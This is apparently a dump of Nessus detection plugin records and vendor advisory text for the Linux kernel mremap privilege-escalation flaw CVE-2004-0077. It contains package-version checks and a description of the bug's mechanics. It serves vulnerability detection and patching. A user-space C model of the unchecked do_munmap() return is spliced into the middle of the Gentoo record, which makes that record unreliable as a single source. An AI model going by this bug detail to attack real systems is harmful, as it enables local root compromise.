The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12468);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_xref(name:\"RHSA\", value:\"2004:066\");\n\n script_name(english:\"RHEL 3 : kernel (RHSA-2004:066)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix a security vulnerability that may\nallow local users to gain root privileges are now available. These\npackages also resolve other minor issues.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nPaul Starzetz discovered a flaw in return value checking in mremap()\nin the Linux kernel versions 2.4.24 and previous that may allow a\nlocal attacker to gain root privileges. No exploit is currently\navailable; however this issue is exploitable. 
The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which\ncontain backported security patches that correct these issues.\n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0077\"\n );\n # http://www10.software.ibm.com/developerworks/opensource/linux390/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ibm.com/us-en/?ar=1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:066\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-BOOT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:s390utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2004-0077\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2004:066\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:066\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-doc-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-smp-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", 
reference:\"kernel-smp-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-source-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"s390utils-1.2.4-3\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"s390x\", reference:\"s390utils-1.2.4-3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-BOOT / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:56:15", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-444-1 : linux-kernel-2.4.17-ia64 - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.17-ia64"], "id": "DEBIAN_DSA-444.NASL", "href": "https://www.tenable.com/plugins/nessus/15281", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-444. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15281);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"444\");\n\n script_name(english:\"Debian DSA-444-1 : linux-kernel-2.4.17-ia64 - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-444\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in a separate advisory\nrespectively or are not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.17-ia64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.17-ia64\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-itanium\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-itanium-smp\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-mckinley\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-mckinley-smp\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.4.17-ia64\", reference:\"011226.16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:55:58", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-441-1 : linux-kernel-2.4.17-mips+mipsel - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-patch-2.4.17-mips", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-441.NASL", "href": "https://www.tenable.com/plugins/nessus/15278", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-441. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15278);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"441\");\n\n script_name(english:\"Debian DSA-441-1 : linux-kernel-2.4.17-mips+mipsel - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-441\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.4.17-mips\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", 
\"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.17\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r3k-kn02\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r4k-ip22\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r4k-kn04\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r5k-ip22\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.4.17-mips\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mips-tools\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:48", "description": "The remote host is affected by the vulnerability described in GLSA-200403-02\n(Linux kernel do_mremap local privilege escalation vulnerability)\n\n The memory subsystem allows for shrinking, growing, and moving of\n chunks of memory along any of the allocated memory areas which the\n kernel possesses.\n To accomplish this, the do_mremap code calls the do_munmap() kernel\n function to remove any old memory mappings in the new location - but,\n the code doesn't check the return value of the do_munmap() 
function\n which may fail if the maximum number of available virtual memory area\n descriptors has been exceeded.\n Due to the missing return value check after trying to unmap the middle\n of the first memory area, the corresponding page table entries from the\n second new area are inserted into the page table locations described by\n the first old one, thus they are subject to page protection flags of\n the first area. As a result, arbitrary code can be executed.\n \nImpact :\n\n Arbitrary code with normal non-super-user privileges may be able to\n exploit this vulnerability and may disrupt the operation of other parts\n of the kernel memory management subroutines finally leading to\n unexpected behavior.\n Since no special privileges are required to use the mremap() and\n munmap() system calls any process may misuse this unexpected behavior\n to disrupt the kernel memory management subsystem. Proper exploitation\n of this vulnerability may lead to local privilege escalation allowing\n for the execution of arbitrary code with kernel level root access.\n Proof-of-concept exploit code has been created and successfully tested,\n permitting root escalation on vulnerable systems. As a result, all\n users should upgrade their kernels to new or patched versions.\n \nWorkaround :\n\n Users who are unable to upgrade their kernels may attempt to use\n 'sysctl -w vm.max_map_count=1000000', however, this is a temporary fix\n which only solves the problem by increasing the number of memory areas\n that can be created by each process. 
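The failure mode the GLSA text describes (do_mremap() dropping the result of do_munmap(), with the vm.max_map_count limit as the trigger), shown as an added user-space C model. This is not kernel code and not part of the advisory: the descriptor table, its capacity, the addresses and the protection values are invented for the illustration, and only the function and sysctl names follow the advisory. The unchecked mover (check == false) relocates the area even though the unmap of its destination failed, so two areas end up over the same pages, which is the model's stand-in for page-table entries landing under another area's protection flags; the checked mover returns the error instead. Raising the limit, as the workaround does, only changes when the unchecked path misbehaves, which is why the scenario is run at the limit and with the limit raised.

```c
/*
 * Added user-space model of the CAN-2004-0077 bug class (unchecked
 * do_munmap() result inside do_mremap()). Not kernel code: the table,
 * its size, the addresses and the protection values are invented for
 * the illustration; only the names follow the advisory.
 */
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

#define MAX_VMAS 8          /* capacity of the model's descriptor table */
#define PROT_RW  3          /* model values, not <sys/mman.h> constants */
#define PROT_RX  5

struct vma { unsigned long start, end; int prot; };   /* covers [start, end) */

struct mm {
    struct vma vmas[MAX_VMAS];
    int nr_vmas;
    int max_map_count;      /* stands in for the vm.max_map_count sysctl */
};

static int vma_insert(struct mm *mm, unsigned long start, unsigned long end, int prot)
{
    if (mm->nr_vmas >= MAX_VMAS || mm->nr_vmas >= mm->max_map_count)
        return -ENOMEM;
    mm->vmas[mm->nr_vmas++] = (struct vma){ start, end, prot };
    return 0;
}

static int vma_find(const struct mm *mm, unsigned long start, unsigned long end)
{
    for (int i = 0; i < mm->nr_vmas; i++)
        if (mm->vmas[i].start == start && mm->vmas[i].end == end)
            return i;
    return -1;
}

/*
 * Unmap [start, end). Punching a hole in the middle of an area needs one
 * extra descriptor for the tail, so at the map-count limit this fails with
 * -ENOMEM, the failure the advisory describes. The limit is checked before
 * anything is modified, so a failed call leaves the table as it was.
 */
static int do_munmap(struct mm *mm, unsigned long start, unsigned long end)
{
    int splits = 0;

    for (int i = 0; i < mm->nr_vmas; i++)
        if (mm->vmas[i].start < start && end < mm->vmas[i].end)
            splits++;
    if (mm->nr_vmas + splits > mm->max_map_count || mm->nr_vmas + splits > MAX_VMAS)
        return -ENOMEM;

    for (int i = 0; i < mm->nr_vmas; i++) {
        struct vma *v = &mm->vmas[i];
        if (end <= v->start || v->end <= start)
            continue;                                    /* disjoint */
        if (v->start < start && end < v->end) {          /* hole in the middle */
            unsigned long tail_end = v->end;
            v->end = start;
            vma_insert(mm, end, tail_end, v->prot);      /* cannot fail: pre-checked */
        } else if (start <= v->start && v->end <= end) { /* fully covered: drop it */
            mm->vmas[i] = mm->vmas[mm->nr_vmas - 1];
            mm->nr_vmas--;
            i--;
        } else if (v->start < start) {
            v->end = start;                              /* trim the tail */
        } else {
            v->start = end;                              /* trim the head */
        }
    }
    return 0;
}

/*
 * Relocate [old_start, old_start+len) to new_addr the way mremap(MREMAP_FIXED)
 * does: unmap whatever lives at the destination, then move the descriptor.
 * check == false drops the do_munmap() result (vulnerable kernels);
 * check == true propagates it (the fix).
 */
static int do_mremap(struct mm *mm, unsigned long old_start, unsigned long len,
                     unsigned long new_addr, bool check)
{
    unsigned long old_end = old_start + len, new_end = new_addr + len;
    int idx, ret;

    if (vma_find(mm, old_start, old_end) < 0 || (new_addr < old_end && old_start < new_end))
        return -EINVAL;     /* no such area, or source and destination overlap */

    ret = do_munmap(mm, new_addr, new_end);
    if (check && ret)
        return ret;

    /* The unchecked path reaches this point with the destination still mapped,
     * so the moved area now shares pages with a live one. */
    idx = vma_find(mm, old_start, old_end);   /* still present: ranges are disjoint */
    mm->vmas[idx].start = new_addr;
    mm->vmas[idx].end = new_end;
    return 0;
}

/* True if two areas cover the same pages, which a consistent table never allows. */
static bool mm_has_overlap(const struct mm *mm)
{
    for (int i = 0; i < mm->nr_vmas; i++)
        for (int j = i + 1; j < mm->nr_vmas; j++)
            if (mm->vmas[i].start < mm->vmas[j].end && mm->vmas[j].start < mm->vmas[i].end)
                return true;
    return false;
}

struct outcome { int ret; bool overlap; int nr_vmas; };

/* Scenario: a RW data area plus a separate RX page; the RX page is then moved
 * into the middle of the data area. The split that unmap needs is what pushes
 * the table over max_map_count. Addresses are hypothetical. */
static struct outcome run_scenario(int max_map_count, bool check)
{
    struct mm mm = { .nr_vmas = 0, .max_map_count = max_map_count };
    struct outcome o;

    vma_insert(&mm, 0x10000, 0x20000, PROT_RW);
    vma_insert(&mm, 0x30000, 0x31000, PROT_RX);
    o.ret = do_mremap(&mm, 0x30000, 0x1000, 0x14000, check);
    o.overlap = mm_has_overlap(&mm);
    o.nr_vmas = mm.nr_vmas;
    return o;
}

int main(void)
{
    const char *label[] = { "unchecked", "checked" };
    int limits[] = { 2, 4 };    /* 2: process at its limit; 4: limit raised, as the workaround does */

    for (int l = 0; l < 2; l++)
        for (int c = 0; c < 2; c++) {
            struct outcome o = run_scenario(limits[l], c);
            printf("%-9s max_map_count=%d: ret=%d nr_vmas=%d overlap=%s\n",
                   label[c], limits[l], o.ret, o.nr_vmas, o.overlap ? "yes" : "no");
        }
    return 0;
}
```

Build with `cc -std=c99 -Wall model.c` and run it: at the limit the unchecked mover reports success while the table holds two overlapping areas, the checked mover returns -ENOMEM and leaves the table untouched, and with the limit raised both succeed cleanly, which is exactly the difference between the sysctl workaround and the real fix.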
Because of the static nature of\n this workaround, it is not recommended and users are urged to upgrade\n their systems to the latest available patched sources.", "edition": 28, "published": "2004-08-30T00:00:00", "title": "GLSA-200403-02 : Linux kernel do_mremap local privilege escalation vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-08-30T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:alpha-sources", "p-cpe:/a:gentoo:linux:planet-ccrma-sources", "p-cpe:/a:gentoo:linux:mips-prepatch-sources", "p-cpe:/a:gentoo:linux:openmosix-sources", "p-cpe:/a:gentoo:linux:aa-sources", "p-cpe:/a:gentoo:linux:grsec-sources", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:win4lin-sources", "p-cpe:/a:gentoo:linux:ppc-sources-crypto", "p-cpe:/a:gentoo:linux:development-sources", "p-cpe:/a:gentoo:linux:vanilla-prepatch-sources", "p-cpe:/a:gentoo:linux:hardened-sources", "p-cpe:/a:gentoo:linux:pac-sources", "p-cpe:/a:gentoo:linux:sparc-sources", "p-cpe:/a:gentoo:linux:gaming-sources", "p-cpe:/a:gentoo:linux:sparc-dev-sources", "p-cpe:/a:gentoo:linux:compaq-sources", "p-cpe:/a:gentoo:linux:ia64-sources", "p-cpe:/a:gentoo:linux:ppc-sources", "p-cpe:/a:gentoo:linux:wolk-sources", "p-cpe:/a:gentoo:linux:hppa-sources", "p-cpe:/a:gentoo:linux:gs-sources", "p-cpe:/a:gentoo:linux:ppc-sources-dev", "p-cpe:/a:gentoo:linux:mips-sources", "p-cpe:/a:gentoo:linux:ppc-development-sources", "p-cpe:/a:gentoo:linux:gentoo-sources", "p-cpe:/a:gentoo:linux:ck-sources", "p-cpe:/a:gentoo:linux:ppc-sources-benh", "p-cpe:/a:gentoo:linux:hppa-dev-sources", "p-cpe:/a:gentoo:linux:vanilla-sources", "p-cpe:/a:gentoo:linux:selinux-sources", "p-cpe:/a:gentoo:linux:gentoo-dev-sources", "p-cpe:/a:gentoo:linux:xfs-sources", "p-cpe:/a:gentoo:linux:mm-sources", "p-cpe:/a:gentoo:linux:usermode-sources"], "id": "GENTOO_GLSA-200403-02.NASL", "href": "https://www.tenable.com/plugins/nessus/14453", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-02.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14453);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_xref(name:\"GLSA\", value:\"200403-02\");\n\n script_name(english:\"GLSA-200403-02 : Linux kernel do_mremap local privilege escalation vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-02\n(Linux kernel do_mremap local privilege escalation vulnerability)\n\n The memory subsystem allows for shrinking, growing, and moving of\n chunks of memory along any of the allocated memory areas which the\n kernel possesses.\n To accomplish this, the do_mremap code calls the do_munmap() kernel\n function to remove any old memory mappings in the new location - but,\n the code doesn't check the return value of the do_munmap() function\n which may fail if the maximum number of available virtual memory area\n descriptors has been exceeded.\n Due to the missing return value check after trying to unmap the middle\n of the first memory area, the corresponding page table entries from the\n second new area are inserted into the page table locations described by\n the first old one, thus they are subject to page protection flags of\n the first area. 
